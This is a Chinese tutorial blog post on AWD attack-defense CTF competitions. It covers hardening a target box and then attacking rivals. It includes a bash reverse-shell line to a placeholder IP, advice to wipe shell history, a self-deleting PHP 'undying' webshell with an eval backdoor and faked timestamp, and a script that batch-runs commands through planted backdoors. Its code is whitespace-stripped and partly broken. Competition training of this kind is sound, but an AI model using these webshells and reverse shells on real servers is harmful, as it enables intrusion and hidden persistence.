CTF?AWD入门实例分析


这篇文章主要介绍了CTFAWD入门实例分析的相关知识,内容详细易懂,操作简单快捷,具有一定借鉴价值,相信大家阅读完这篇CTFAWD入门实例分析文章都会有所收获,下面我们一起来看看吧。

    引文

    AWD赛制是一种网络安全竞赛的赛制。AWD赛制由安全竞赛专家及行业专家凭借十多年实战经验,将真实网络安全防护设备设施加入抽象的网络环境中,模拟、企业、院校等单位的典型网络结构和配置,开展的一种人人对抗的竞赛方式,考验参赛者攻防兼备的能力。

    其主要特点为:强调实战性、实时性、对抗性,综合考量竞赛队的渗透能力和防护能力。

    站点部署

    比赛开始时我们会分配到一个至多个靶机,通常是分配给我们ssh 用户名和密码还有虚拟ip等信息,我们需要自己去连接靶机。个人推荐使用xshell搭配xftp来使用,当我们连接靶机之后要做什么呢。

    dump源码

    比赛开始第一件事,dump网站源码,使用ssh工具保留源码,复制两份,用d盾去扫一份,因为当我们靶机受到攻击时对手可能直接删除我们的源码导致靶机DOWN机,而通常比赛中主办方会在源码中留有一些后门,我们用D盾去扫描一下来进行修复攻击

    数据库备份

    我们登录数据库来进行备份,当数据被删除时可以使用命令快速还原。

    mysqldump-udb_user-pdb_passwddb_name>1.sql//备份指定数据库

    还原命令:

    mysql-udb_user-pdb_passwddb_name<1.sql//还原指定数据库

    修改密码

    当主办方给我们的连接密码过于简单时,不排除对手先登录我们靶机来进行破坏,于是我们要快速修改弱口令密码。

    linux修改ssh即本地密码:

    passwd

    修改mysql登录密码:

    mysql>setpasswordforroot@localhost=password('xino');

    关闭不必要端口

    一些端口会存在漏洞,为了保证安全我们关闭一些不必要的端口来进行维护:

    部署WAF

    WAF是用来分析阻挡对手攻击的工具它可以分析流量,别人攻击我们的时候,我们可以看到别人的攻击方式。当没有攻击思路时我们就可以分析流量,使用别人的攻击方式。 部署方式如下:

    每个文件前边加:

    require_once(waf.php);

    为了方便我们可以修改php.ini配置文件,来自动给当前文件夹下文件头部添加:

    auto_prepend_file=<filename>;

    攻击(ATTACK)

    当我们部署完自己的靶机确认没有漏洞后,我们便可以尝试攻击别人机器了。

    弱口令

    当发现靶机存在弱口令后,我们就可以遍历IP地址来查询存活的机器来自动连接查找FLAG,或者在受害者靶机里植入后门文件来维持我们的控制。

    自带后门

    通常靶机会有自带的后门木马,我们知道路径后便可以写一个脚本批量连接来提交FLAG。

    nmap

    扫描C段存活主机:

    .\nmapxxx.xxx.xxx.xxx/24

    保存为TXT文件以便于之后编写脚本去攻击。

    WEB攻击

    举几个比较常见的WEB攻击方式:

    文件读取,伪协议方式读取flag

    文件上传,绕过黑白名单上传一句话,用工具连接查找flag

    命令执行,通过system等函数来遍历文件

    SQL注入,寻找注入点注出flag

    当我们找到上面漏洞后,尽量去写一个脚本来自动提交flag,之后再去寻找其他漏洞。

    写入木马

    因为AWD赛制是回合制,所以我们要想保持长时间稳定上分就要时刻控制别人靶机,也就是要传入木马但又不能被对手发现,下面列举几个权限维持的小技巧。

    bash反弹shell

    利用预留后门上传上面的php文件并访问,就可以用nc反弹shell,nc反弹shell命令如下:

    bash-i>&/dev/tcp/xx.xxx.xxx.xxx/90>&1nc-l-p8080

    注意: 使用bash命令,会在root目录生成名为~/.bash_history的记录文件,我们要清除来消除威胁。

    不死马

    一个简单的不死马:

    <?phpignore_user_abort(true);set_time_limit(0);unlink(__FILE__);$file='.config.php';$code='<?phpif(md5($_GET["pass"])=="1a1dc91c907325c69271ddf0c944bc72"){@eval($_POST[a]);}?>';//pass=passwhile(1){file_put_contents($file,$code);system('touch-m-d"2023-10-2104:17:18".config.php');usleep(5000);}?>

    不死马的作用就是将该php文件上传到服务器,然后进行访问,会在该路径下循环生成名字为.config.php的不死马隐藏文件。以此来达到权限维持。

    提交脚本

    比赛中可能会有几十台靶机,尽管我们知道了如何攻击,但一个一个打似乎有一些太慢了,所以这时我们要利用脚本去批量提交解放双手。这里就在网上找了几个常用的:

    预留后门利用脚本:

    importrequestsurl_head="xxx.xx.xxx."#网段url=""shell_addr="/Upload/index.php"passwd="xxxxx"#木马密码port="80"payload={passwd:'system('cat/flag');'}webshelllist=open("webshelllist.txt","w")flag=open("firstround_flag.txt","w")foriinrange(30,61):url=url_head+str(i)+":"+port+shell_addrtry:res=requests.post(url,payload,timeout=1)ifres.status_code==requests.codes.ok:result=url+"connectshellsucess,flagis"+res.textprintresultprint>>flag,resultprint>>webshelllist,url+","+passwdelse:print"shell404"except:printurl+"connectshellfail"webshelllist.close()flag.close()

    批量提交flag脚本(需根据要求自行修改):

    importsysimportjsonimporturllibimporthttplibserver_host=''#提交flag的服务器地址server_port=80defsubmit(team_token,flag,host=server_host,port=server_port,timeout=5):ifnotteam_tokenornotflag:raiseException('teamtokenorflagwrong')conn=httplib.HTTPConnection(host,port,timeout=timeout)params=urllib.urlencode({#提交需要post的参数,根据情况修改'token':team_token,'flag':flag,})headers={"Content-type":"application/x-form-urlencode"}conn.request('POST','[submit_flag_dir]',params,headers)#第二个参数为提交flag的目录response=conn.getresponse()data=response.read()returnjson.loads(data)if__name__=='__main__':iflen(sys.argv)<3:print'usage:./submitflag.py[team_token][flag]'sys.exit()host=server_hostiflen(sys.argv)>3:host=sys.argv[3]printjson.dumps(submit(sys.argv[1],sys.argv[2],host=host),indent=4)

    防御(DEFENSE)

    既然有攻击那么也需要防御别人的攻击,上面其实已经讲了一些防御的技巧了,比如修改弱口令,上传WAF等,这里就简单总结一下其他常用的知识吧。

    查找flag的位置

    find/-name*flag*

    查找password

    find.|xargsgrep"password"

    查看以建立的连接和进程

    netstat-antulp|grepEST

    结束进程

    killPIDkillall<进程名>  

    检测TCP连接数量

    netstat-ant|awk|grep|sed-e-e|sort|uniq-c|sort-rn

    chattr命令防止系统中某个关键文件被修改

    chattr+i/etc/resolv.conf

    流量监控

    当别人访问我们靶机时请求的URL可能就是攻击的payload,我们如果知道他们的请求就可以利用他们的手段来反打过去,这个基于流量监控来实现,一个简单的脚本如下:

    <?phpdate_default_timezone_set('Asia/Shanghai');$ip=$_SERVER["REMOTE_ADDR"];//记录访问者的ip$filename=$_SERVER['PHP_SELF'];//访问者要访问的文件名$parameter=$_SERVER["QUERY_STRING"];//访问者要请求的参数$time=date('Y-m-dH:i:s',time());//访问时间$logadd='来访时间:'.$time.'-->'.'访问链接:'.''.$ip.$filename.'?'.$parameter."\r\n";//log记录$fh=fopen("log.txt","a");fwrite($fh,$logadd);fclose($fh);?>

    关于“CTFAWD入门实例分析”这篇文章的内容就介绍到这里,感谢各位的阅读!相信大家对“CTFAWD入门实例分析”知识都有一定的了解,大家如果还想学习更多知识,欢迎关注主机评测网行业资讯频道。


    上一篇:vue如何动态修改a标签的样式

    下一篇:php如何实现字符转电码


    Copyright © 2002-2019 测速网 www.inhv.cn 皖ICP备2023010105号
    测速城市 测速地区 测速街道 网速测试城市 网速测试地区 网速测试街道
    温馨提示:部分文章图片数据来源与网络,仅供参考!版权归原作者所有,如有侵权请联系删除!

    热门搜索 城市网站建设 地区网站制作 街道网页设计 大写数字 热点城市 热点地区 热点街道 热点时间 房贷计算器